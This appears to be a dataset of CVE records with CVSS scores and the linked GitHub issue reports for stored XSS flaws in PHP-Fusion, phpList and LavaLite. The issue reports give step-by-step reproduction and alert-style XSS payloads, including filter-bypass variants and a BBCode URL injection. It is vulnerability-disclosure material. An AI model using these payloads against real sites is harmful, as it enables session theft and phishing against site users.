[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.60:*:*:*:*:*:*:*", "matchCriteriaId": "A4375E88-4C03-4C87-9835-3AEC42937686", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/phpfusion/PHPFusion/issues/2329
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phpfusion", "PHPFusion" ]
**Describe the bug** BBCode URL Tag Script Injection "Shoutbox Admin" **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/php-fusion/infusions/shoutbox_panel/shoutbox_admin.php" 3. Click "New Shout" 4. Insert script injection: `[url]https://nvd.nist.gov?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]` 5. Click " Send Message" 6. Click "Edit" open url redirect insert script. ![4](https://user-images.githubusercontent.com/29293812/82236426-4877ae80-995e-11ea-9437-7f83c1283679.PNG) 7. Logout user. 8. Access link "/php-fusion/infusions/shoutbox_panel/shoutbox_archive.php" 9. Click any "Form Sign In" open url redirect insert script. ![3](https://user-images.githubusercontent.com/29293812/82236457-52011680-995e-11ea-9acf-7b30027c0d7e.PNG) **Impact** An attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks. **Video POC** Video POC link: https://drive.google.com/open?id=1g9x6B-K338qnzHjWtbEHCadpyPLx-daX **Desktop (please complete the following information):** - OS: Kali - Browser: Firefox - Version of Browser: 68.6
BBCode URL Tag Script Injection "Shoutbox" PHP Fusion 9.0.36
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2329/comments
5
2020-05-18T16:30:19Z
2020-05-19T17:04:34Z
https://github.com/PHPFusion/PHPFusion/issues/2329
620,346,643
2,329
2,133
CVE-2020-23184
2021-07-02T18:15:08.287
A stored cross site scripting (XSS) vulnerability in /administration/settings_registration.php of PHP-Fusion 9.03.60 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Registration" field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2323" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2323" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.60:*:*:*:*:*:*:*", "matchCriteriaId": "A4375E88-4C03-4C87-9835-3AEC42937686", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpfusion/PHPFusion/issues/2323
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phpfusion", "PHPFusion" ]
**Describe the bug** An authent.icated malicious user can take advantage of a Stored XSS vulnerability in the "Registration Settings" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/administration/settings_registration.php" 3. Click on Registration. 4. Insert payload: ![4](https://user-images.githubusercontent.com/29293812/82032590-a63d9980-96c5-11ea-95c9-9d84e25ace21.PNG) 5. Click "Save Setting" 6. Go to "/home.php", click Register ![9](https://user-images.githubusercontent.com/29293812/82032902-22d07800-96c6-11ea-902d-7b5ba11b0c52.PNG) 7. Click " Terms of Agreement" ![10](https://user-images.githubusercontent.com/29293812/82033357-d0438b80-96c6-11ea-944f-9dd24d5c7dc9.PNG) 8. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Screenshots** XSS Alert Message: ![11](https://user-images.githubusercontent.com/29293812/82033528-0bde5580-96c7-11ea-9aba-80d76c69c940.PNG) **Desktop (please complete the following information):** - OS: Kali - Browser: Firefox - Version of Browser: 68.6
Cross Site Script Vulnerability on "Registration Settings"
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2323/comments
1
2020-05-15T09:16:34Z
2020-05-15T10:19:00Z
https://github.com/PHPFusion/PHPFusion/issues/2323
618,822,681
2,323
2,134
CVE-2020-23185
2021-07-02T18:15:08.327
A stored cross site scripting (XSS) vulnerability in /administration/setting_security.php of PHP-Fusion 9.03.60 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.60:*:*:*:*:*:*:*", "matchCriteriaId": "A4375E88-4C03-4C87-9835-3AEC42937686", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpfusion/PHPFusion/issues/2331
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phpfusion", "PHPFusion" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "security" feature. This was can be bypassed by using HTML event handlers, such as "onload". **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/administration/setting_security.php" 3. Insert payload: <svg/onload=alert(/XSS/)// 4. Click "Save Settings" 5. Login user the page. 6. View the preview to trigger XSS. 7. View the preview to get in request and such Stored XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![8](https://user-images.githubusercontent.com/29293812/82474783-c3270200-9af5-11ea-94d8-7e141b496f96.PNG) ![7](https://user-images.githubusercontent.com/29293812/82474791-c621f280-9af5-11ea-85ce-78ee5c4ae6e6.PNG) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Security" feature in PHP-Fusion 9.03.60 (New Version)
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2331/comments
7
2020-05-20T16:59:26Z
2020-06-05T10:46:42Z
https://github.com/PHPFusion/PHPFusion/issues/2331
621,928,611
2,331
2,135
CVE-2020-23190
2021-07-02T18:15:08.367
A stored cross site scripting (XSS) vulnerability in the "Import emails" module in phplist 3.5.4 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/667" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/667" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:3.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "FFDAE283-4668-4471-ADA0-2A3EA4B0B138", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/667
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Import Mail" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/?page=import&tk=6adb3efa27ad1baa355bd3b62671c46b" 3. Click "import by uploading a file with emails" 4. Insert payload: <svg/on<script><script>load=alert('XSS')//</script> 5. Click "Save " 6. View the preview to trigger XSS. 7. View the preview to get in request and such Stored XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![image](https://user-images.githubusercontent.com/29293812/82859123-135ff300-9f40-11ea-8de6-61517bfdc695.png) ![image](https://user-images.githubusercontent.com/29293812/82859195-47d3af00-9f40-11ea-9bfe-80e30160e4c3.png) ![image](https://user-images.githubusercontent.com/29293812/82859225-591cbb80-9f40-11ea-8fb5-5b1db2a5b926.png) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1 **PHP List Version 3.5.5**
Cross Site Scripting Vulnerability on "Import Mail" feature in PHP List
https://api.github.com/repos/phpList/phplist3/issues/667/comments
2
2020-05-26T04:03:24Z
2020-05-26T21:50:51Z
https://github.com/phpList/phplist3/issues/667
624,586,286
667
2,136
CVE-2020-23192
2021-07-02T18:15:08.407
A stored cross site scripting (XSS) vulnerability in phplist 3.5.4 and below allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload in the "admin" parameter under the "Manage administrators" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/671" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/671" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*", "matchCriteriaId": "80F89BDF-79BF-4D6F-9542-F6383C37FFBD", "versionEndExcluding": null, "versionEndIncluding": "3.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/671
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Manage administrators" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/?page=admins&tk=569e1f6f9e6b3a9abd9046ff57e34aaf" 3. Click "Manage administrators" 4. Click "admin" edit infomation admin. 5. Insert payload: "><svg/onload=alert(/XSS/)> ![image](https://user-images.githubusercontent.com/29293812/83284012-4e934800-a206-11ea-900d-45d9ebefbcd8.png) // # "><svg/onload=prompt(/SonGohan22/)> 6. Click "Save Changes" 7. View the preview to trigger XSS. 8. View the preview to get in request and such Stored XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![image](https://user-images.githubusercontent.com/29293812/83283300-3111ae80-a205-11ea-8f7d-c6d5b70560fb.png) Insert payload ![image](https://user-images.githubusercontent.com/29293812/83283469-78983a80-a205-11ea-85d0-2bc041a1f1e4.png) Click "Save Changes" -> Click "List of administrator" -> View Stored XSS ![image](https://user-images.githubusercontent.com/29293812/83283920-2e638900-a206-11ea-818c-9c158ee6ed66.png) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Manage administrators" feature in PHPList 3.5.3, 3,5.4
https://api.github.com/repos/phpList/phplist3/issues/671/comments
1
2020-05-29T16:45:03Z
2020-05-29T20:33:36Z
https://github.com/phpList/phplist3/issues/671
627,397,494
671
2,137
CVE-2020-23194
2021-07-02T18:15:08.450
A stored cross site scripting (XSS) vulnerability in the "Import Subscribers" feature in phplist 3.5.4 and below allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/678" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/678" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*", "matchCriteriaId": "80F89BDF-79BF-4D6F-9542-F6383C37FFBD", "versionEndExcluding": null, "versionEndIncluding": "3.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/678
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Import subscribers" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/?page=import2&tk=93e3e3e3bbd0bd48b788a384c549813b" 3. Click "Browse" 4. Import payload file SVG: ![image](https://user-images.githubusercontent.com/29293812/83971042-440e3800-a903-11ea-9542-7c005adc7d32.png) 5. Click button "Import" 6. Click select "Email". 7. Click button "CONTINUE" 8. View the preview to trigger XSS. 9. View the preview to get in request and such Stored XSS. **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![phplist222](https://user-images.githubusercontent.com/29293812/83971596-5ccc1d00-a906-11ea-9447-b2abe397c7df.PNG) ![phplist223](https://user-images.githubusercontent.com/29293812/83971598-605fa400-a906-11ea-9ef1-7737d178c883.PNG) ![phplist224](https://user-images.githubusercontent.com/29293812/83971602-62c1fe00-a906-11ea-87ca-1a4ddd9b5ae2.PNG) Trigger XSS ![phplist_final](https://user-images.githubusercontent.com/29293812/83971604-66ee1b80-a906-11ea-839f-5bfa0a4c55d0.PNG) **Desktop (please complete the following information):** - OS: Ubuntu - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Import subscribers" feature in PHPList 3.5.4 upload file SVG.
https://api.github.com/repos/phpList/phplist3/issues/678/comments
2
2020-06-07T14:34:39Z
2020-06-12T13:57:18Z
https://github.com/phpList/phplist3/issues/678
633,466,385
678
2,138
CVE-2020-36395
2021-07-02T18:15:08.497
A stored cross site scripting (XSS) vulnerability in the /admin/user/team component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/321" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lavalite:lavalite:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "B3D6757B-5BF4-402B-9A71-D79B460EC3C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/LavaLite/cms/issues/321
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LavaLite", "cms" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Teams" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/user/team" 3. Click "New" 4. Insert payload: ![3](https://user-images.githubusercontent.com/29293812/82789409-6bd9b680-9e94-11ea-9c71-5182be399363.PNG) <svg/on<script><script>load=alert(/XSS/)//</script> // # "><svg/onload=prompt(1337)> 5. Click "Save " 6. View the preview to trigger XSS. 7. View the preview to get in request and such Stored XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![photo_2020-05-25_14-27-23](https://user-images.githubusercontent.com/29293812/82789076-e3f3ac80-9e93-11ea-9301-67c820704dda.jpg) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Team" feature in Lavelite
https://api.github.com/repos/LavaLite/cms/issues/321/comments
0
2020-05-25T07:39:18Z
2020-05-26T03:57:11Z
https://github.com/LavaLite/cms/issues/321
624,108,967
321
2,139
CVE-2020-36396
2021-07-02T18:15:08.540
A stored cross site scripting (XSS) vulnerability in the /admin/roles/role component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/322" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lavalite:lavalite:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "B3D6757B-5BF4-402B-9A71-D79B460EC3C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/LavaLite/cms/issues/322
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LavaLite", "cms" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Roles & Permissions" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/roles/role" 3. Click "New" 4. Insert payload: ![3](https://user-images.githubusercontent.com/29293812/82791110-62058280-9e97-11ea-9869-60ab09efc9ee.PNG) <svg/on<script><script>load=alert('XSS')//</script> // # "><svg/onload=prompt('XSS')> 5. Click "Save " 6. View the preview to trigger XSS. 7. View the preview to get in request and such Stored XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![photo_2020-05-25_14-54-11](https://user-images.githubusercontent.com/29293812/82791291-ad1f9580-9e97-11ea-8a24-e637b47fad3c.jpg) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Roles & Permissions" feature in Lavelite.
https://api.github.com/repos/LavaLite/cms/issues/322/comments
6
2020-05-25T07:50:11Z
2022-02-02T01:25:30Z
https://github.com/LavaLite/cms/issues/322
624,114,681
322
2,140
CVE-2020-36397
2021-07-02T18:15:08.580
A stored cross site scripting (XSS) vulnerability in the /admin/contact/contact component of LavaLite 5.8.0 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/323" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/323" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lavalite:lavalite:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "B3D6757B-5BF4-402B-9A71-D79B460EC3C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/LavaLite/cms/issues/323
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LavaLite", "cms" ]
